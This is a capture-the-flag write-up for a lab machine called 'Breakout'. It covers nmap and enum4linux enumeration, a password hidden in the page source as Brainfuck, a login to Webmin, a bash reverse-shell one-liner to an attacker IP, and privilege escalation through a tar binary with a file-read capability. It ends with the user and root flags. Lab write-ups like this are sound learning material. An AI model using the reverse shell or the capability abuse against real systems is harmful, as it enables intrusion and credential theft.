Breakout

Difficulty: Easy

Enumeration

nmap

We start scanning with nmap with the following command line. This line scans all open ports, tries to detect the services running on the ports, determine the versions and run detection scripts.

sudo nmap -p- -sC -sV --min-rate 5000 --open -vvv -n -Pn 192.168.1.46

PORT      STATE SERVICE     REASON         VERSION
80/tcp    open  http        syn-ack ttl 64 Apache httpd 2.4.51 ((Debian))
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp   open  netbios-ssn syn-ack ttl 64 Samba smbd 4.6.2
445/tcp   open  netbios-ssn syn-ack ttl 64 Samba smbd 4.6.2
10000/tcp open  http        syn-ack ttl 64 MiniServ 1.981 (Webmin httpd)
|_http-server-header: MiniServ/1.981
|_http-favicon: Unknown favicon MD5: 75C5BD2E2D20D547F33BCB04ADB20CD0
|_http-title: 200 — Document follows
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
20000/tcp open  http        syn-ack ttl 64 MiniServ 1.830 (Webmin httpd)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 79B65889866572A8F43F8DDE9150D647
|_http-title: 200 — Document follows
|_http-server-header: MiniServ/1.830

Host script results:
|_clock-skew: 0s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   BREAKOUT<00>         Flags: <unique><active>
|   BREAKOUT<03>         Flags: <unique><active>
|   BREAKOUT<20>         Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00
| smb2-time: 
|   date: 2023-11-12T14:26:36
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 31772/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 52058/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 53448/udp): CLEAN (Failed to receive data)
|   Check 4 (port 56426/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

whatweb

We then use whatweb to identify technologies and platforms used by this website.

View Page Source

We go to the web browser and check that Apache2 is running.

Let's check the source code and find a pleasant surprise.

This appears to be a program written in a specific programming language called Brainfuck. Brainfuck is a minimalist programming language designed to be extremely simple with a minimal set of instructions.

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
-->

We interpret this line on a web site and we get the following result:

.2uqPEfj3D<P'a-3

enum4linux

With enum4linux we will collect information about the users and shared resources on a system.

enum4linux -a 192.168.1.46

We have found a local user.

Exploitation

Now that we have these possible credentials, let's try to access them on port 20000.

User: cyber => Pass: .2uqPEfj3D<P'a-3

And to a positive result, we have agreed. After navigating through the different sections, we access the Command Shell and check that it returns the commands.

We start the common procedure to generate a reverse shell with netcat.

nc -lvnp 9001

bash -i >& /dev/tcp/192.168.1.117/9001 0<&1

We find the file user.txt and with the cat command we can read it.

To search for vulnerabilities we use the command line getcap -r / 2>/dev/null which is used to search and display Linux capabilities in executable files on the system.

getcap -r / 2>/dev/null

The cap_dac_read_search=ep capability associated with the tar binary in the /home/cyber directory indicates that the tar binary has the right to read and search directories even if it does not have standard read permissions.

Privilege Escalation

Doing a little bit of enumeration on the machine, we can see that there is a old_pass.bak file located in /var/backups but we don’t have the required permissions to view the file contents.

The following command line is using the tar command to create a backup file named pass.tar containing the contents of the file /var/backups/.old_pass.bak and thus exploiting the vulnerability found in this binary.

./tar -cvf pass.tar /var/backups/.old_pass.bak

We extract the data with the following line and get root.

tar xvf pass.tar

Flags

user.txt

3mp!r3{You_Manage_To_Break_To_My_Secure_Access}

root.txt

Ts&4&YurgtRX(=~h

With this we have successfully completed this machine.